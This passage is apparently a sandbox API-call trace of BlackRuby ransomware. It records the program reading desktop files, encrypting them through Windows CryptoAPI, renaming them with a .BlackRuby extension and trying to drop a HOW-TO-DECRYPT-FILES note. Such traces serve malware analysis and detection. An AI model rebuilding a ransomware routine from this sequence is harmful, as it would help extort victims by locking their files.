"c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), fInfoLevelId=0x0, lpFileInformation=0x1c4111c | out: lpFileInformation=0x1c4111c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545ce40, ftCreationTime.dwHighDateTime=0x1d34aa0, ftLastAccessTime.dwLowDateTime=0xcd154010, ftLastAccessTime.dwHighDateTime=0x1d356ce, ftLastWriteTime.dwLowDateTime=0xcd154010, ftLastWriteTime.dwHighDateTime=0x1d356ce, nFileSizeHigh=0x0, nFileSizeLow=0x1786b)) returned 1 [0055.885] GetLastError () returned 0x5 [0055.885] SetErrorMode (uMode=0x0) returned 0x1 [0055.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.885] GetLastError () returned 0x5 [0055.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.885] GetLastError () returned 0x5 [0055.885] SetErrorMode (uMode=0x1) returned 0x0 [0055.885] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.885] GetLastError () returned 0x0 [0055.885] GetFileType (hFile=0x184) returned 0x1 [0055.885] SetErrorMode (uMode=0x0) returned 0x1 [0055.885] GetFileType (hFile=0x184) returned 0x1 [0055.885] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x1786b [0055.885] GetLastError () returned 0x0 [0055.885] ReadFile (in: hFile=0x184, lpBuffer=0x2b09c90, nNumberOfBytesToRead=0x1786b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2b09c90*, lpNumberOfBytesRead=0x18ed84*=0x1786b, lpOverlapped=0x0) returned 1 [0055.886] GetLastError () returned 0x0 [0055.886] CloseHandle (hObject=0x184) returned 1 [0055.886] GetLastError () returned 0x0 [0055.887] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.887] GetLastError () returned 0x0 [0055.887] SetErrorMode (uMode=0x1) returned 0x0 [0055.887] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545ce40, ftCreationTime.dwHighDateTime=0x1d34aa0, ftLastAccessTime.dwLowDateTime=0xcd154010, ftLastAccessTime.dwHighDateTime=0x1d356ce, ftLastWriteTime.dwLowDateTime=0xcd154010, ftLastWriteTime.dwHighDateTime=0x1d356ce, nFileSizeHigh=0x0, nFileSizeLow=0x1786b)) returned 1 [0055.887] GetLastError () returned 0x0 [0055.887] SetErrorMode (uMode=0x0) returned 0x1 [0055.898] CryptImportKey (in: hProv=0x37c708, pbData=0x1c9d27c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0055.898] GetLastError () returned 0x0 [0055.898] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.898] GetLastError () returned 0x0 [0055.903] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.903] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0055.903] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.903] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1cca2c8*=0x1, dwFlags=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.903] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1cca294, dwFlags=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.904] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b38ea0*, pdwDataLen=0x18ed74*=0x17960, dwBufLen=0x17960 | out: pbData=0x2b38ea0*, pdwDataLen=0x18ed74*=0x17960) returned 1 [0055.904] GetLastError () returned 0x0 [0055.905] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cca324*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cca324*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.905] GetLastError () returned 0x0 [0055.905] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cca354*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cca354*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.905] GetLastError () returned 0x0 [0055.907] CryptDestroyKey (hKey=0x360ee0) returned 1 [0055.907] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.907] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.907] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.907] GetLastError () returned 0x0 [0055.907] SetErrorMode (uMode=0x1) returned 0x0 [0055.907] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.909] GetLastError () returned 0xb7 [0055.909] GetFileType (hFile=0x184) returned 0x1 [0055.909] SetErrorMode (uMode=0x0) returned 0x1 [0055.909] GetFileType (hFile=0x184) returned 0x1 [0055.909] WriteFile (in: hFile=0x184, lpBuffer=0x2b97480*, nNumberOfBytesToWrite=0x17970, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x2b97480*, lpNumberOfBytesWritten=0x18ed90*=0x17970, lpOverlapped=0x0) returned 1 [0055.911] GetLastError () returned 0xb7 [0055.911] CloseHandle (hObject=0x184) returned 1 [0055.912] GetLastError () returned 0xb7 [0055.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav", lpFilePart=0x0) returned 0x2f [0055.912] GetLastError () returned 0xb7 [0055.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_FLGRDvejktesCoprTkTHRTOCcWvna6ORkEBEFLPIJr2X.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_FLGRDvejktesCoprTkTHRTOCcWvna6ORkEBEFLPIJr2X.BlackRuby", lpFilePart=0x0) returned 0x59 [0055.912] GetLastError () returned 0xb7 [0055.912] SetErrorMode (uMode=0x1) returned 0x0 [0055.912] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545ce40, ftCreationTime.dwHighDateTime=0x1d34aa0, ftLastAccessTime.dwLowDateTime=0xcd154010, ftLastAccessTime.dwHighDateTime=0x1d356ce, ftLastWriteTime.dwLowDateTime=0x29841000, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17970)) returned 1 [0055.912] GetLastError () returned 0xb7 [0055.912] SetErrorMode (uMode=0x0) returned 0x1 [0055.912] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\FEqCtc0h4ZNhJIzvVo.wav" (normalized: "c:\\users\\eebsym5\\desktop\\feqctc0h4znhjizvvo.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_FLGRDvejktesCoprTkTHRTOCcWvna6ORkEBEFLPIJr2X.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_flgrdvejktescoprtkthrtoccwvna6orkebeflpijr2x.blackruby")) returned 1 [0055.914] GetLastError () returned 0xb7 [0055.914] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.914] GetLastError () returned 0xb7 [0055.914] SetErrorMode (uMode=0x1) returned 0x0 [0055.914] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.914] GetLastError () returned 0x5 [0055.916] SetErrorMode (uMode=0x0) returned 0x1 [0055.916] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.916] GetLastError () returned 0x5 [0055.916] SetErrorMode (uMode=0x1) returned 0x0 [0055.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce7478 | out: lpFileInformation=0x1ce7478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10af2d0, ftCreationTime.dwHighDateTime=0x1d356ca, ftLastAccessTime.dwLowDateTime=0xe10aad00, ftLastAccessTime.dwHighDateTime=0x1d3502d, ftLastWriteTime.dwLowDateTime=0xe10aad00, ftLastWriteTime.dwHighDateTime=0x1d3502d, nFileSizeHigh=0x0, nFileSizeLow=0x18e2e)) returned 1 [0055.916] GetLastError () returned 0x5 [0055.916] SetErrorMode (uMode=0x0) returned 0x1 [0055.916] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.916] GetLastError () returned 0x5 [0055.916] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.916] GetLastError () returned 0x5 [0055.916] SetErrorMode (uMode=0x1) returned 0x0 [0055.917] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.917] GetLastError () returned 0x0 [0055.917] GetFileType (hFile=0x184) returned 0x1 [0055.917] SetErrorMode (uMode=0x0) returned 0x1 [0055.917] GetFileType (hFile=0x184) returned 0x1 [0055.917] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x18e2e [0055.917] GetLastError () returned 0x0 [0055.918] ReadFile (in: hFile=0x184, lpBuffer=0x2baee10, nNumberOfBytesToRead=0x18e2e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2baee10*, lpNumberOfBytesRead=0x18ed84*=0x18e2e, lpOverlapped=0x0) returned 1 [0055.918] GetLastError () returned 0x0 [0055.919] CloseHandle (hObject=0x184) returned 1 [0055.919] GetLastError () returned 0x0 [0055.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.919] GetLastError () returned 0x0 [0055.919] SetErrorMode (uMode=0x1) returned 0x0 [0055.919] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10af2d0, ftCreationTime.dwHighDateTime=0x1d356ca, ftLastAccessTime.dwLowDateTime=0xe10aad00, ftLastAccessTime.dwHighDateTime=0x1d3502d, ftLastWriteTime.dwLowDateTime=0xe10aad00, ftLastWriteTime.dwHighDateTime=0x1d3502d, nFileSizeHigh=0x0, nFileSizeLow=0x18e2e)) returned 1 [0055.919] GetLastError () returned 0x0 [0055.919] SetErrorMode (uMode=0x0) returned 0x1 [0055.919] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0055.920] GetLastError () returned 0x0 [0055.953] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1d4373c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0055.953] GetLastError () returned 0x0 [0055.953] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.953] GetLastError () returned 0x0 [0055.961] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.961] GetLastError () returned 0x0 [0055.961] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0055.961] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.961] GetLastError () returned 0x0 [0055.961] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b6d2d0*=0x1, dwFlags=0x0) returned 1 [0055.961] GetLastError () returned 0x0 [0055.961] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b6d29c, dwFlags=0x0) returned 1 [0055.961] GetLastError () returned 0x0 [0055.962] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2be0bb0*, pdwDataLen=0x18ed74*=0x18f20, dwBufLen=0x18f20 | out: pbData=0x2be0bb0*, pdwDataLen=0x18ed74*=0x18f20) returned 1 [0055.962] GetLastError () returned 0x0 [0055.962] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6d32c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b6d32c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.962] GetLastError () returned 0x0 [0055.962] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6d35c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b6d35c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.962] GetLastError () returned 0x0 [0055.965] CryptDestroyKey (hKey=0x360de0) returned 1 [0055.965] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.965] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.965] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.965] GetLastError () returned 0x0 [0055.965] SetErrorMode (uMode=0x1) returned 0x0 [0055.965] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.966] GetLastError () returned 0xb7 [0055.966] GetFileType (hFile=0x184) returned 0x1 [0055.966] SetErrorMode (uMode=0x0) returned 0x1 [0055.966] GetFileType (hFile=0x184) returned 0x1 [0055.968] CloseHandle (hObject=0x184) returned 1 [0055.968] GetLastError () returned 0xb7 [0055.968] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg", lpFilePart=0x0) returned 0x2d [0055.968] GetLastError () returned 0xb7 [0055.968] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_L1tQJoCZBjrCKWBshaTP4iEEYA9MYWYuW5WuNe16vaXtT1L.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_L1tQJoCZBjrCKWBshaTP4iEEYA9MYWYuW5WuNe16vaXtT1L.BlackRuby", lpFilePart=0x0) returned 0x5c [0055.968] GetLastError () returned 0xb7 [0055.968] SetErrorMode (uMode=0x1) returned 0x0 [0055.968] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10af2d0, ftCreationTime.dwHighDateTime=0x1d356ca, ftLastAccessTime.dwLowDateTime=0xe10aad00, ftLastAccessTime.dwHighDateTime=0x1d3502d, ftLastWriteTime.dwLowDateTime=0x298d9580, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18f30)) returned 1 [0055.969] GetLastError () returned 0xb7 [0055.969] SetErrorMode (uMode=0x0) returned 0x1 [0055.969] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\fJUFQv sEQqPfmzl.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\fjufqv seqqpfmzl.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_L1tQJoCZBjrCKWBshaTP4iEEYA9MYWYuW5WuNe16vaXtT1L.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_l1tqjoczbjrckwbshatp4ieeya9mywyuw5wune16vaxtt1l.blackruby")) returned 1 [0055.969] GetLastError () returned 0xb7 [0055.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.970] GetLastError () returned 0xb7 [0055.970] SetErrorMode (uMode=0x1) returned 0x0 [0055.970] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.970] GetLastError () returned 0x5 [0055.971] SetErrorMode (uMode=0x0) returned 0x1 [0055.971] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0055.971] GetLastError () returned 0x5 [0055.971] SetErrorMode (uMode=0x1) returned 0x0 [0055.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1b8a480 | out: lpFileInformation=0x1b8a480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bfc0050, ftCreationTime.dwHighDateTime=0x1d3585a, ftLastAccessTime.dwLowDateTime=0xc6c2d2a0, ftLastAccessTime.dwHighDateTime=0x1d359ac, ftLastWriteTime.dwLowDateTime=0xc6c2d2a0, ftLastWriteTime.dwHighDateTime=0x1d359ac, nFileSizeHigh=0x0, nFileSizeLow=0x7a2e)) returned 1 [0055.971] GetLastError () returned 0x5 [0055.971] SetErrorMode (uMode=0x0) returned 0x1 [0055.972] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0055.972] GetLastError () returned 0x5 [0055.972] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0055.972] GetLastError () returned 0x5 [0055.972] SetErrorMode (uMode=0x1) returned 0x0 [0055.972] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.972] GetLastError () returned 0x0 [0055.972] GetFileType (hFile=0x184) returned 0x1 [0055.972] SetErrorMode (uMode=0x0) returned 0x1 [0055.972] GetFileType (hFile=0x184) returned 0x1 [0055.972] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x7a2e [0055.972] GetLastError () returned 0x0 [0055.972] ReadFile (in: hFile=0x184, lpBuffer=0x1b8c2d4, nNumberOfBytesToRead=0x7a2e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b8c2d4*, lpNumberOfBytesRead=0x18ed84*=0x7a2e, lpOverlapped=0x0) returned 1 [0055.973] GetLastError () returned 0x0 [0055.973] CloseHandle (hObject=0x184) returned 1 [0055.973] GetLastError () returned 0x0 [0055.973] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp", lpFilePart=0x0) returned 0x26 [0055.973] GetLastError () returned 0x0 [0055.973] SetErrorMode (uMode=0x1) returned 0x0 [0055.973] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\hGbkVl2vb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\hgbkvl2vb.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bfc0050, ftCreationTime.dwHighDateTime=0x1d3585a, ftLastAccessTime.dwLowDateTime=0xc6c2d2a0, ftLastAccessTime.dwHighDateTime=0x1d359ac, ftLastWriteTime.dwLowDateTime=0xc6c2d2a0, ftLastWriteTime.dwHighDateTime=0x1d359ac, nFileSizeHigh=0x0, nFileSizeLow=0x7a2e)) returned 1 [0055.973] GetLastError () returned 0x0 [0055.973] SetErrorMode (uMode=0x0) returned 0x1 [0055.973] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0055.974] GetLastError () returned 0x0 [0056.009] CryptImportKey (in: hProv=0x37c680, pbData=0x1bf5ad4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0056.009] GetLastError () returned 0x0 [0056.009] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.009] GetLastError () returned 0x0 [0056.014] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0056.014] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c22b20*=0x1, dwFlags=0x0) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c22aec, dwFlags=0x0) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c22b68*, pdwDataLen=0x18ed74*=0x7b20, dwBufLen=0x7b20 | out: pbData=0x1c22b68*, pdwDataLen=0x18ed74*=0x7b20) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c321d4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c321d4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c32204*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c32204*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.014] GetLastError () returned 0x0 [0056.014] CryptDestroyKey (hKey=0x360aa0) returned 1 [0056.014] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 